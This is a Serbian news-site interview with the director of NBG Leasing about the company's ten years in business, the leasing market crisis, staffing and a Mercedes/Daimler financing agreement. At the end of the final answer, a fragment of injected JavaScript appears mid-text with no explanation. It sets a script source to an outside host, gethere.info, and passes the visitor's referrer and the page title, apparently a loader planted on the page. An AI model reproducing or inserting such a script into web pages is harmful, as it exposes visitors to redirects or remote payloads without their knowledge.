Biznis
13.10.2016. 11:39
ekspres

SILVANA TRIČKOVIĆ, DIREKTORKA NBG LEASING-A: Kriza kao izazov, a ne kao prepreka

Ekspres.net
Izvor: Ekspres.net

Za razliku od Evrope, lizing industrija u Srbiji je i dalje u povoju, a njenu ekspanziju zaustavila je ekonomska kriza koja je uzdrmala ne samo domaću već i svetsku ekonomiju. Uprkos svemu tome, kompanija “NBG leasing” beleži izuzetne rezultate u ovoj oblasti prilagođavajući svoju ponudu potrebama klijenata i kretanjima na tržištu. Nešto više o tome saznali smo u razgovoru sa direktorkom kompanije “NBG Leasing”, Silvanom Tričković.
“NBG Leasing” ove godine beleži deset godina poslovanja. Kako biste okarakterisali poziciju kompanije koju vodite danas u odnosu na njene početke 2006. godine?
Prave reči koje opisuju naše poslovanje, su stabilnost i rast. Stabilnost je suština naše poslovne filozofije i ogleda se u svakom aspektu našeg poslovanja. Stabilnost u ponudi, u saradnji sa našim partnerima, kao i odnosu sa našim klijentima. Takođe ovaj princip u potpunost primenjujemo u odnosu na naše zaposlene. Pored rasta “NBG Leasing-a” na tržištu, o čemu svedoče godišnji, šestomesečni i kvartalni izveštaji, rast je nešto što karakteriše i atmosferu unutar naše kompanije. Naš tim je stabilan, ne menja se često i raste u svakom smislu te reči. Smatram da je za uspeh jedne kompanije vrlo bitno da se principi i načela, koja se komuniciraju i primenjuju ka poslovnim partnerima i klijentima, primenjuju i unutar same kompanije. Odgovornost, predan lični radi, ali i dobri međuljudski odnosi, podrška i poverenje među zaposlenima, kao i u odnosu na zaposlene od strane kompanije odnosno poslodavca, predstavljaju ključ uspeha. Uvek sam verovala da zadovoljan i stabilan tim može da ostvari izuzetne rezultate i za sada se to pokazalo kao tačno.
Da li biste mogli da nam kroz određene parametre prikažete u čemu se ogleda stabilnost i rast kompanije „NBG Leasing“?
U prethodnom periodu, u poslednjih deset godina, uspeli ne samo da učvrstimo našu poziciju na domaćem tržištu, već i da je unapredimo. 38 zaposlenih uspelo je da poveća udeo kompanije na domaćem tržištu u odnosu na 2006 godinu za 8,2 % i ostvari kumulativni profit od preko 8 miliona EUR. Naša stabilnost se ogleda i kroz dugogodišnju saradnju sa renomiranim brendovima iz automobilske industrije, kao I kroz saradnju sa liderima u oblasti poljoprivredne mehanizacije.

Znamo da je prethodnih nekoliko godina tržište lizinga potresala kriza. Veliki broj lizing kuća je prestao da plasira nova sredstva. Kakva je vaša pozicija na tršištu?

I pored činjenice da je ukupan nivo novih plasmana u 2015 godini ispod nivoa iz 2006 godine, NBG Leasing je jedna od retkih kompanija koja je uspela, svo ovo vreme, da održava postojeci nivo i kvalitet portfolija, uz dobru reputaciju, zadovoljne klijente i konstantu profitabilnost. Naša kompanija je jedan od lidera u finansiranju automobila I poljoprivredne mehanizacije. Sigurnost i pouzdanost je nešto čemu težimo i što smo, mogu slobodno reći, ostvarili.

Koji je vaš recept za uspeh?

Bogat portfolio poznatih brendova – Mercedes Benz, Hyndai, Harley Davidson, Class, inovativni pristup, otvorenost ka potrebama i zahtevima naših klijenata i partnera, istančan osećaj za originalne poslovne ideje koje treba podržati je ono po čemu se kompanija koju vodim, izdvaja od drugih na tržištu. Svi ovi elementi, koje sam navela, a koji su sastavni deo našeg poslovanja razlog su što NBG Leasing, bez obzira na krizu, i dalje beleži pozitivne rezultate. Pouzdanost, koju potvrđujemo saradnjom sa renomiranim kompanijama, fleksibilnost koja se ogleda u saradnji sa velikim brojem različitih klijenata, kao i efikasnost koja se ogleda u brzini i kvalitetu realizacije svih zahteva naših klijenata, razlog je što uspevamo da održimo dobar trend.

Lizing, kao finansijski proizvod – način finansiranja, je i dalje nedovoljno jasan najširoj javnosti. Da li možete nešto više da nam kažete o tome, na koji način finansijski lizing može biti zanimljiv malim i srednjim preduzećima, kao i preduzetnicima uopšte?
Pored automobila, autobusa i kamiona, NBG Leasing finansira i opremu neophodnu za pokretanje ili unapređenje poslovanja. Ukoliko neko ima dobru ideju, dobru poslovnu strategiju, a neophodna mu je finansijska podrška, lizing predstavlja najbolje sredstvo putem koga će doći do potrebne opreme, alata neophodnih za sopstveni biznis. U proteklih nekoliko godina finansirali smo opremu za različite namene, od fitness centara, medicinske opreme do poljoprivredne mehanizacije i automobila. Želim da istaknem da NBG Leasing veliku šansu vidi u poljoprivredi, imajući u vidu da agroindustrija predstavlja najznačajniju privrednu oblast u našoj zemlji. U našoj ponudi, kao eksluzivni zastupnici nudimo poljoprivrednu mehanizaciju marke Class, koja predstavlja vrhunsko ime u ovoj oblasti.

Prema izveštaju NBS, broj zaposlenih u sektoru finansijskog lizinga u Srbiji se smanjuje. Da li ste i vi bili prinuđeni da racionalizujete broj zaposlenih?

Činjenica je da je broj zaposlenih u lizing industriji smanjen za 17% u odnosu na 2009 godinu. I pored toga, a imajući u vidu stabilno poslovanje i kontinuiranu profitabilnost, NBG Leasing u ovom periodu nije smanjivao broj zaposlenih. U ovim teškim vremenima vođeni smo posebnim izazovima da se konstantno usavršavamo i bodrimo naše zaposlene da se razvijaju zajedno sa nama. Kada je kompanija osnovana, u nju su došli neki mladi i neiskusni svršeni studenti. Danas su to uspešni poslovni ljudi. Svojim zaposlenima često kažem da sam srećna sam jer je u našoj “maloj porodici” na početku bilo samo troje dece, dok danas brojimo četrdeset. Naša kompanija, u ovom trenutku, ima više dece nego zaposlenih. I upravo zbog toga, što ceo tim prepoznaje prave vrednosti, mislim da imamo dobru podlogu za odlične poslovne rezultate i ubuduće.

“NBG Leasing” je potpisao ugovor sa Mercedesovom finansijskom institucijom.
Šta za vas znači ovaj ugovor?
Uspešna saradnja Mercedes Benz-a a, kompanije Star Import i NBG Leasing-a krunisana je potpisivanjem Master Cooperation Agreement sa Daimler Financial Services AG, čime NBG Leasing nastavlja saradnju sa ovim renomiranim proizvođačem automobila. Ovaj ugovor nam mnogo znači, ne samo zato što je potvrda uspešne saradnje koja traje već 10 godina, nego zato što potvrđuje činjenicu da je NBG Leasing siguran i pouzdan partner, velikim brendovima i kompanijama kao što je Merceds Benz, ali ujedno i našim klijentima kojima nudimo vrhunske proizvode i vrhunsku uslugu.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
15°C
30.05.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve